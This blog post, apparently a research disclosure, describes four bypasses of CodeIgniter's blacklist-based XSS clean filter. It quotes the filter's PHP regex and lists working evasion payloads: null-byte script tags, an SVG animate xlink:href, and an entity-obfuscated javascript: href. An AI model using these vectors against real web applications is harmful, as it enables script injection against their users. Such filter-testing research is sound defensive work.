Latest News

Code Igniter XSS Filter Multiple Bypasses


Recently we released our "XSS Filter Evasion Cheat Sheet", i was quite surprised to hear the community feedback. The total downloads have surpassed a figure of 2500, which was quite amazing considering that i didn't expect it to escalate that quickly.  Recently, i had a chance to test Code Igniter's XSS clean function, as it relied upon blacklist it caught my interest. I was pleased that almost all the payloads/techniques that were used to bypass the "XSSCLEAN" function have been already documented inside our "XSS Filter Evasion Cheat Sheet".

Vulnerability Details

The test-bed i used was setup by @soaj1664ashar based upon the rules of the "XSS Clean" function inside of code igniter.

http://xssplayground.net23.net/clean11.html

I managed to find lots of bypasses, however couple of them collided with what @soaj1664ashar had already found before. Therefore, i thought to publish the ones that did not collide with his vectors.

Bypass 1 - Null Bytes

Internet explorer up to version 9, ignores null bytes every where. The XSSClean function was filtering for keywords like <script>, however it was not filtering out the null bytes. Therefore under Internet explorer 9 and below, the following is a valid vector executing javascript perfectly.

<scr\x00ipt>confirm(1);</scr\x00ipt>

Bypass 2 - SVG and XLINK

The XSSCLEAN function was not filtering out the SVG tag and the xlink attribute. Along with it the XSSCLEAN function was also filtering out keywords such as javascript, vbscript etc. However this doesn't prevents us from executing javascript.

protected function _js_link_removal($match)
{
//echo "in link removal";
return str_replace($match[1],
preg_replace('#href=.*?(?:alert\(|alert&\#40;|javascript:|livescript:|mocha:|charset=|window\.|document\.|\.cookie|<script|<xss|data\s*:)#si',
'',
$this->_filter_attributes(str_replace(array('<', '>'), '', $match[1]))
),
$match[0]);

}

The following payload manages to pass through the XSSCLEAN function of Codeigniter and yields a valid javascript:

<svg xmlns:xlink=http://www.w3.org/1999/xlink><a><circle r=100 /><animate attributeName=xlink:href values=;javas&Tab;cript&colon;confirm&lpar;1&rpar; />

Bypass 3 - HREF


Since, we were able bypass the blacklist that was looking for the keyword "javascript", we can use the href tag to execute valid javascript.

<a/href=javas&Tab;cript&colon;confirm(top.location)>XSS

There are countless other variations thought.

Bypass 4 - Separators

There are certain characters that get's parsed as whitespace characters, since the "Code Igniter" was not filtering out the space characters, they can be used to yield a valid javascript syntax inside various browsers. For more information on them, please refer to our "XSS Filter Evasion Cheat Sheet".

More Bypasses

Ashar javed found various bypasses for CodeIgniter, if you are interested in more bypasses, please refer the link below:

https://github.com/EllisLab/CodeIgniter/issues/2667

No comments:

Post a Comment

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code